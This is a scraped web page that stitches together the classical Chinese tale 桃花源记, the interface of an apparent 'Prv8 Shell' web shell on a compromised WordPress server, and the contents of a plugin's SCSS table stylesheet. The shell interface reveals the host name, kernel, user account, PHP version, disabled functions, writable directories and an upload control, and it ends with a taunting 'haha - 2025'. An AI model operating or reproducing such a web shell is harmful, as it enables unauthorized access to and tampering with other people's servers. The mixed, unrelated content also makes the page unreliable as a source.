晋太元中,武陵人捕鱼为业。缘溪行,忘路之远近。忽逢桃花林,夹岸数百步,中无杂树,芳草鲜美,落英缤纷。渔人甚异之,复前行,欲穷其林。   林尽水源,便得一山,山有小口,仿佛若有光。便舍船,从口入。初极狭,才通人。复行数十步,豁然开朗。土地平旷,屋舍俨然,有良田、美池、桑竹之属。阡陌交通,鸡犬相闻。其中往来种作,男女衣着,悉如外人。黄发垂髫,并怡然自乐。   见渔人,乃大惊,问所从来。具答之。便要还家,设酒杀鸡作食。村中闻有此人,咸来问讯。自云先世避秦时乱,率妻子邑人来此绝境,不复出焉,遂与外人间隔。问今是何世,乃不知有汉,无论魏晋。此人一一为具言所闻,皆叹惋。余人各复延至其家,皆出酒食。停数日,辞去。此中人语云:“不足为外人道也。”(间隔 一作:隔绝)   既出,得其船,便扶向路,处处志之。及郡下,诣太守,说如此。太守即遣人随其往,寻向所志,遂迷,不复得路。   南阳刘子骥,高尚士也,闻之,欣然规往。未果,寻病终。后遂无问津者。 .
Prv8 Shell
Server : Apache
System : Linux srv.rainic.com 4.18.0-553.47.1.el8_10.x86_64 #1 SMP Wed Apr 2 05:45:37 EDT 2025 x86_64
User : rainic ( 1014)
PHP Version : 7.4.33
Disable Function : exec,passthru,shell_exec,system
Directory :  /home/stando/www/wp-content/plugins/wpmudev-updates/assets/src/scss/admin-ui/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Current File : /home/stando/www/wp-content/plugins/wpmudev-updates/assets/src/scss/admin-ui/_table-plugins.scss
body:not(.wpmud-plugins) {
  p.dashui-note-refresh.refresh-infos {
    font-size: 13px !important;
    text-align: center !important;
    margin: 60px 0 0;
    color: #888 !important;
    padding: 14px 0 !important;
    border-radius: 4px;
    border: 1px solid #e6e6e6;
  }
}

@include body-class(true) {

  .dashui-table-plugins {
    table-layout: auto;
    color: palette(gray, light);

    tbody {

      tr {
        box-shadow: inset 3px 0 $blue;

        &:not(.dashui-is-notinstalled) {
          .dashui-column-actions.plugin-row-actions {
            text-align: center;
          }
        }

        td {

          &.plugin-row-actions {
            &.plugin-row-actions-right {
              text-align: right;
            }
          }

          .sui-button-icon {
            &.disabled,
            &:disabled,
            &[disabled] {
              background: inherit;
              color: #8888888a;
            }
          }

          &:first-child {

            @include media(max-width, md) {
              padding-left: 0;
            }
          }

          &:not(:last-child) {

            @include media(max-width, md) {
              margin-bottom: 10px;
            }
          }

          &:last-child {

            @include media(max-width, md) {
              padding-right: 0;
            }
          }

          @include media(max-width, md) {
            height: auto;
            display: block;
            padding: 0 0 0 26px;
            border-bottom-width: 0;
          }
        }

        .dashui-column-title,
        .dashui-column-actions {

          .dashui-plugin-actions {

            &.dashui-mobile-hidden {

              @include media(max-width, md) {
                display: none;
              }
            }

            &.dashui-desktop-hidden {

              @include media(min-width, md) {
                display: none;
              }
            }
          }

          .dashui-loader-wrap {
            .dashui-loader {
              display: none;

              i {
                margin-right: 10px;
              }
            }
          }
        }

        .dashui-column-title {

          .dashui-plugin-title {
            display: flex;

            button {
              font-size: 13px !important;
            }

            span {
              font-size: 10px !important;
            }

            .sui-checkbox {

              input + span {

                @include media(max-width, md) {
                  margin: 7px 0;
                }
              }

              @include media(max-width, md) {
                margin-right: 10px;
                margin-bottom: 0;
              }
            }

            .dashui-plugin-image {
              width: 30px;
              height: 30px;
              display: block;
              flex: 0 0 30px;
              border-radius: $border-radius;
              background-color: palette(silver, light);
              background-repeat: no-repeat;
              background-position: center;
              background-size: cover;

              + .dashui-plugin-name {
                margin-left: 15px;
                font-weight: 500;

                &:hover {
                  color: #b5b4b4 !important;
                }

                a {
                  &:hover {
                    color: #b5b4b4 !important;
                  }
                }
              }
            }

            .dashui-plugin-name {
              cursor: pointer;
              margin: 0;
              padding: 0;
              border: 0;
              background-color: transparent;
              color: palette(gray, dark);
              font: bold 13px/22px $font;
              letter-spacing: $font--letter-spacing;
              text-align: left;
              transition: 0.2s ease;

              a {
                cursor: pointer;
                margin: 0;
                padding: 0;
                border: 0;
                background-color: transparent;
                color: palette(gray, dark);
                font: bold 13px/22px $font;
                letter-spacing: $font--letter-spacing;
                text-align: left;
                transition: 0.2s ease;
                font-weight: 500;
              }

              &,
              &:hover,
              &:active {
                outline: none;
                box-shadow: none;
              }

              &:hover,
              &:active {
                color: $blue;
              }

              @include media(max-width, md) {
                flex: 1;
              }

              @include media(min-width, md) {
                flex: 0 1 auto;
              }

            }

            .dashui-plugin-actions {
              margin-left: 10px;
            }

            @include media(min-width, md) {
              align-items: center;
            }
          }

          @include media(min-width, md) {
            width: 1%;
            min-width: 280px;
          }

          @include media(min-width, lg) {
            min-width: 320px;
          }
        }

        .dashui-column-description {

          @include media(min-width, md) {
            width: 40%;
          }
        }

        .dashui-column-actions {
          width: 10%;

          .dashui-plugin-actions {
            display: flex;
            align-items: center;

            &.dashui-mobile-hidden {

              strong {
                flex: 0 0 auto;

                + .sui-actions-right {
                  margin-left: 10px;
                }
              }

              .sui-button {
                //max-width: 113px;

                .sui-loading-text {
                  overflow: hidden;
                  text-overflow: ellipsis;
                  white-space: nowrap;
                }

                &[data-action="project-configure"],
                &[data-action="project-update"],
                &[data-action="upgrade-membership"],
                &[data-action="project-activate"] {
                  min-width: 0px;
                  max-width: 30px;

                  i {
                    margin: 0 auto;
                  }
                }

                &[data-action="upgrade-membership"] {
                  color: #8d00b1;
                }

              }

              .sui-actions-right {
                flex: 1;
                justify-content: flex-end;

                .sui-tag {
                  overflow: hidden;
                  display: block;
                  text-overflow: ellipsis;
                  white-space: nowrap;
                }

                @include media(max-width, md) {
                  overflow: hidden;
                }
              }
            }

            &.dashui-desktop-hidden {
              padding-top: 10px;
            }
          }

          .sui-tag {
            font-size: 10px;
          }

          @include media(max-width, md) {
            margin-top: -10px;
          }

          @include media(min-width, md) {
            //width: 23%;
            //min-width: 206px;
          }
        }

        &.dashui-bulk-action {
          box-shadow: none;

          td {

            .sui-checkbox {

              @include media(max-width, md) {
                margin-bottom: 0;
                margin-right: 10px;
              }
            }

            @include media(max-width, md) {
              display: flex;
              align-items: center;
              padding: 0;
            }

            @include media(min-width, md) {
              padding-top: 15px;
              padding-bottom: 15px;
            }
          }

          @include media(max-width, md) {
            padding-top: 0;
            padding-bottom: 14px;
          }
        }

        @include media(max-width, md) {
          display: block;
          position: relative;
          padding: 20px;
          border-bottom: 1px solid palette(silver, soft);
        }

        &:last-child {

          td {
            border-bottom: 1px solid #e6e6e6;
          }
        }

        &:last-child {
          border-bottom: 1px solid #e6e6e6;
        }
      }

      .dashui-tr-header {
        box-shadow: none;

        p {
          color: #AAAAAA;
          font-size: 12px;
          font-weight: bold;
          vertical-align: baseline;
        }
      }

      .dashui-plugin-notactive {
        box-shadow: inset 3px 0 #888888;
      }

      .dashui-plugin-hasupdate {
        box-shadow: inset 3px 0 #fecf2f;
      }

      .dashui-is-notinstalled.dashui-plugin-notactive {
        box-shadow: none;
      }

      tr.dashui-plugin-notactive:not(.dashui-is-notinstalled) .dashui-plugin-name a {
        color: #888888 !important;
      }

      tr.dashui-plugin-notactive:not(.dashui-is-notinstalled):not(.dashui-plugin-hasupdate) img {
        -webkit-filter: grayscale(1);
        filter: grayscale(1);
      }

      @include media(max-width, md) {
        display: block;
      }
    }

    @include media(max-width, md) {
      display: block;
    }
  }

  .dashui-table-installed-plugins {
    border-bottom: 0;
    border-right: 0;
    margin: 0;
    border-radius: 0;

    tbody {
      tr {
        -webkit-box-shadow: inset 3px 0 #17A8E3;
        box-shadow: inset 3px 0 #17A8E3;

        &.has-update {
          -webkit-box-shadow: inset 3px 0 #FECF2F;
          box-shadow: inset 3px 0 #FECF2F;
        }

        &:first-child td {
          margin-top: 15px;
        }

        td {
          position: relative;

          a.sui-button-onload {
            .main-icon {
              display: none
            }
          }
        }

        &:first-child {

          @include media(max-width, md) {
            padding-top: 0;
          }

          @include media(min-width, md) {
            padding-top: 0;
          }
        }
      }
    }
  }

  .dashui-table-widgets {
    h4 {
      font-weight: 500;
      color: #333333;
      font-family: Roboto, Arial, sans-serif;

      a {
        color: #333333;

        &:hover {
          color: #17a8e3;
        }
      }
    }

    tbody {
      tr:last-child {
        padding-bottom: 15px !important;
      }
    }
  }

  .dashui-mobile-hidden {

    @include media(max-width, md) {
      display: none !important;
    }
  }

  .dashui-desktop-hidden {

    @include media(min-width, md) {
      display: none !important;
    }
  }
}

haha - 2025